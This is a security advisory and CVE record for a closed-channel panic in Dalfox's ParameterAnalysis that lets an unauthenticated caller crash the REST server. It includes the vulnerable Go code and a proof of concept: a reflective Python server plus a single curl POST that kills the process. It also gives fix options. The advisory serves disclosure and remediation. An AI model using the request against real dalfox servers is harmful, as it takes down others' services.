Dalfox is a powerful open-source XSS scanner and utility focused on automation. Prior to 2.13.0, ParameterAnalysis in pkg/scanning/parameterAnalysis.go runs two sequential worker stages that both write to the same results channel. The channel is correctly closed after the first stage completes (close(results) at line 438), but the second stage — which processes POST-body parameters (dp) — is then launched with the same already-closed channel as its output. When a scanned parameter is reflected, processParams executes results <- paramResult on the closed channel, triggering a Go runtime panic that crashes the entire dalfox process. In server mode, the crash is remotely triggerable by any unauthenticated caller who can reach the REST API, because the default configuration has no API key and the second stage activates whenever options.Data != "" (i.e., the attacker supplies the data field) and the target reflects at least one parameter. This vulnerability is fixed in 2.13.0.
Dalfox: Unauthenticated Remote DoS via Closed-Channel Write in `ParameterAnalysis` (server mode)
Problem type
- CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
- CWE-404: Improper Resource Shutdown or Release
Affected products
hahwul
< 2.13.0 - AFFECTED
References
https://github.com/hahwul/dalfox/security/advisories/GHSA-2g4x-fq3j-cgq4
https://github.com/hahwul/dalfox/releases/tag/v2.13.0
GitHub Security Advisories
GHSA-2g4x-fq3j-cgq4
Dalfox has an Unauthenticated Remote DoS via Closed-Channel Write in `ParameterAnalysis` (server mode)
https://github.com/advisories/GHSA-2g4x-fq3j-cgq4Summary
ParameterAnalysis in pkg/scanning/parameterAnalysis.go runs two sequential worker stages that both write to the same results channel. The channel is correctly closed after the first stage completes (close(results) at line 438), but the second stage — which processes POST-body parameters (dp) — is then launched with the same already-closed channel as its output. When a scanned parameter is reflected, processParams executes results <- paramResult on the closed channel, triggering a Go runtime panic that crashes the entire dalfox process. In server mode, the crash is remotely triggerable by any unauthenticated caller who can reach the REST API, because the default configuration has no API key and the second stage activates whenever options.Data != "" (i.e., the attacker supplies the data field) and the target reflects at least one parameter.
Severity
High (CVSS 3.1: 7.5)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
- Attack Vector: Network — server binds to
0.0.0.0:6664by default; reachable by any network peer. - Attack Complexity: Low — the attacker controls both trigger conditions: the
datafield that populates the second stage's work queue, and the target URL they point at a reflective server they control. - Privileges Required: None —
--api-keydefaults to"", so no auth middleware is registered. - User Interaction: None.
- Scope: Unchanged — a goroutine panic without a
recoverterminates the entire Go process; the impact stays within the dalfox process authority. - Confidentiality Impact: None.
- Integrity Impact: None.
- Availability Impact: High — the entire dalfox server process crashes, requiring manual restart. A single well-timed request is sufficient.
Note on PR #917: Commit 8a424d1 (fix: resolve data race and nil pointer panic in processParams) fixed two concurrent-safety bugs in processParams — a data race on paramResult.Chars and a nil pointer dereference on resp.Header. It did not fix the closed-channel panic reported here, which is a structural ordering bug in ParameterAnalysis itself, not inside processParams.
Affected Component
pkg/scanning/parameterAnalysis.go—ParameterAnalysis()(lines 436–448):resultschannel closed at line 438, then passed to second-stageprocessParamsworkers at line 445pkg/scanning/parameterAnalysis.go—processParams()(line 299):results <- paramResultpanics whenresultsis closed
CWE
- CWE-362: Concurrent Execution Using Shared Resource with Improper Synchronization ('Race Condition') — channel lifecycle ordering error
- CWE-404: Improper Resource Shutdown or Release
Description
Two-Stage Channel Lifecycle Ordering Error
ParameterAnalysis allocates a single results channel shared by both worker stages:
// pkg/scanning/parameterAnalysis.go:397-408
paramsQue := make(chan string, concurrency)
results := make(chan model.ParamResult, concurrency) // ← single channel for both stages
go func() {
for result := range results { // consumer exits when results is closed
mutex.Lock()
params[result.Name] = result
mutex.Unlock()
}
}()
First stage (URL parameters in p):
// lines 410-437
for i := 0; i < concurrency; i++ {
wgg.Add(1)
go func() {
processParams(target, paramsQue, results, options, rl, miningCheckerLine, pLog)
wgg.Done()
}()
}
// ... feed paramsQue ...
close(paramsQue)
wgg.Wait()
close(results) // ← line 438: results is now closed; consumer goroutine exits
Second stage (POST-body parameters in dp):
// lines 440-448
var wggg sync.WaitGroup
paramsDataQue := make(chan string, concurrency)
for j := 0; j < concurrency; j++ {
wggg.Add(1)
go func() {
processParams(target, paramsDataQue, results, options, rl, miningCheckerLine, pLog)
// ^^^^^^^ — same closed channel
wggg.Done()
}()
}
When a second-stage worker finds a reflected parameter, processParams sends to the closed channel:
// pkg/scanning/parameterAnalysis.go:299
results <- paramResult // panic: send on closed channel
A Go runtime panic in a goroutine without a recover terminates the entire program. In server mode, this kills the dalfox API server process.
Trigger Conditions Are Both Attacker-Controlled
Condition 1 — dp is non-empty: dp (the POST-body parameter map) is populated in addParamsFromWordlist → setP whenever options.Data != "":
// parameterAnalysis.go:41-45
if options.Data != "" {
if dp.Get(name) == "" {
dp.Set(name, "")
}
}
The attacker sets "data": "q=test" in the JSON body, which propagates through Initialize (lib/func.go:106). With "mining-dict": true, the entire GF-XSS wordlist (hundreds of parameters) flows into dp, ensuring the second stage has ample work.
Condition 2 — a parameter is reflected: processParams sends to results only when vrs (verified reflection) is true (line 252 → line 299). The attacker controls the target URL — they point it at a server they operate that reflects any query parameter, guaranteeing vrs = true on the first matching entry from the wordlist.
PR #917 Fixed Different Bugs
Commit 8a424d1 addressed:
- Data race: concurrent
append(paramResult.Chars, char)with no mutex → addedcharsMu sync.Mutex - Nil pointer:
resp.Headeraccessed whenresp == nil→ added&& resp != nilguard
Neither change touches the channel lifecycle in ParameterAnalysis. The closed-channel panic is independent and remains unpatched.
Proof of Concept
# Step 1 — Attacker-controlled reflective server
python3 - <<'PY'
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
class H(BaseHTTPRequestHandler):
def _h(self):
qs = parse_qs(urlparse(self.path).query)
n = int(self.headers.get('Content-Length', '0'))
body = self.rfile.read(n).decode() if n else ''
bq = parse_qs(body)
v = qs.get('q', [''])[0] or bq.get('q', [''])[0]
out = f'<html><body>{v}</body></html>'.encode()
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.send_header('Content-Length', str(len(out)))
self.end_headers()
self.wfile.write(out)
def do_GET(self): self._h()
def do_POST(self): self._h()
def log_message(self, *a): pass
HTTPServer(('127.0.0.1', 18083), H).serve_forever()
PY
# Step 2 — Start dalfox REST server (default: no API key)
go run . server --host 127.0.0.1 --port 16664 --type rest
# Step 3 — Single unauthenticated request terminates the server process
curl -s -X POST http://127.0.0.1:16664/scan \
-H 'Content-Type: application/json' \
--data '{
"url": "http://127.0.0.1:18083/?q=test",
"options": {
"data": "q=test",
"mining-dict": true,
"use-headless": false,
"worker": 1
}
}'
# Expected: dalfox process exits immediately with:
# goroutine N [running]:
# panic: send on closed channel
# pkg/scanning/parameterAnalysis.go:299 +0x...
# Step 4 — Verify server is down
curl -s http://127.0.0.1:16664/health
# Expected: connection refused
No X-API-KEY header is required. The reflective server is attacker-controlled and guarantees the vrs = true condition that triggers the channel write.
Impact
- Complete server process crash on a single unauthenticated POST request — no login, no API key, no special permissions required.
- All in-flight scans are lost without results.
- The server requires a manual restart; under automated process managers (systemd, Docker
--restart=always) repeated triggering can create a denial-of-service loop. - The attack requires only network access to port 6664 and a reflective HTTP server reachable by the dalfox instance — both attacker-controlled conditions.
Recommended Remediation
Option 1: Allocate a fresh results channel for the second stage (preferred)
The simplest and most direct fix: give each stage its own channel and consumer. The second stage should not reuse a channel that was created and closed for the first stage.
// pkg/scanning/parameterAnalysis.go — replace the second stage block:
var wggg sync.WaitGroup
paramsDataQue := make(chan string, concurrency)
results2 := make(chan model.ParamResult, concurrency) // fresh channel
go func() {
for result := range results2 {
mutex.Lock()
params[result.Name] = result
mutex.Unlock()
}
}()
for j := 0; j < concurrency; j++ {
wggg.Add(1)
go func() {
processParams(target, paramsDataQue, results2, options, rl, miningCheckerLine, pLog)
wggg.Done()
}()
}
// ... feed paramsDataQue ...
close(paramsDataQue)
wggg.Wait()
close(results2) // close after all writers are done
Option 2: Merge both parameter maps before the single worker stage
Process p and dp entries through a single shared paramsQue and results, eliminating the two-stage design:
// Before the worker loop, merge dp into p (or into a unified queue):
for k := range dp {
// feed to the same paramsQue along with p entries
}
// Then run a single close(paramsQue) → wgg.Wait() → close(results)
This is a more invasive refactor but removes the structural root cause. The current two-stage design is the fundamental source of the ordering bug.
Option 3: Add a recover in processParams goroutines (stopgap only)
Catching the panic prevents the process from crashing but does not fix the lost results or the channel invariant violation. Recommended only as a temporary defensive measure while the channel lifecycle is corrected:
go func() {
defer func() {
if r := recover(); r != nil {
printing.DalLog("ERROR", fmt.Sprintf("processParams panic recovered: %v", r), options)
}
wggg.Done()
}()
processParams(target, paramsDataQue, results, options, rl, miningCheckerLine, pLog)
}()
Option 1 is the recommended primary fix. Option 3 should be combined with Option 1, not used as a substitute.
Credit
This vulnerability was discovered and reported by bugbunny.ai.
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-45090Click to expand
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2026-45090",
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"dateUpdated": "2026-05-27T17:33:06.856Z",
"dateReserved": "2026-05-08T19:27:26.698Z",
"datePublished": "2026-05-27T17:33:06.856Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M",
"dateUpdated": "2026-05-27T17:33:06.856Z"
},
"title": "Dalfox: Unauthenticated Remote DoS via Closed-Channel Write in `ParameterAnalysis` (server mode)",
"descriptions": [
{
"lang": "en",
"value": "Dalfox is a powerful open-source XSS scanner and utility focused on automation. Prior to 2.13.0, ParameterAnalysis in pkg/scanning/parameterAnalysis.go runs two sequential worker stages that both write to the same results channel. The channel is correctly closed after the first stage completes (close(results) at line 438), but the second stage — which processes POST-body parameters (dp) — is then launched with the same already-closed channel as its output. When a scanned parameter is reflected, processParams executes results <- paramResult on the closed channel, triggering a Go runtime panic that crashes the entire dalfox process. In server mode, the crash is remotely triggerable by any unauthenticated caller who can reach the REST API, because the default configuration has no API key and the second stage activates whenever options.Data != \"\" (i.e., the attacker supplies the data field) and the target reflects at least one parameter. This vulnerability is fixed in 2.13.0."
}
],
"affected": [
{
"vendor": "hahwul",
"product": "dalfox",
"versions": [
{
"version": "< 2.13.0",
"status": "affected"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')",
"cweId": "CWE-362",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"lang": "en",
"description": "CWE-404: Improper Resource Shutdown or Release",
"cweId": "CWE-404",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/hahwul/dalfox/security/advisories/GHSA-2g4x-fq3j-cgq4",
"name": "https://github.com/hahwul/dalfox/security/advisories/GHSA-2g4x-fq3j-cgq4",
"tags": [
"x_refsource_CONFIRM"
]
},
{
"url": "https://github.com/hahwul/dalfox/releases/tag/v2.13.0",
"name": "https://github.com/hahwul/dalfox/releases/tag/v2.13.0",
"tags": [
"x_refsource_MISC"
]
}
],
"metrics": [
{
"cvssV3_1": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH"
}
}
]
}
}
}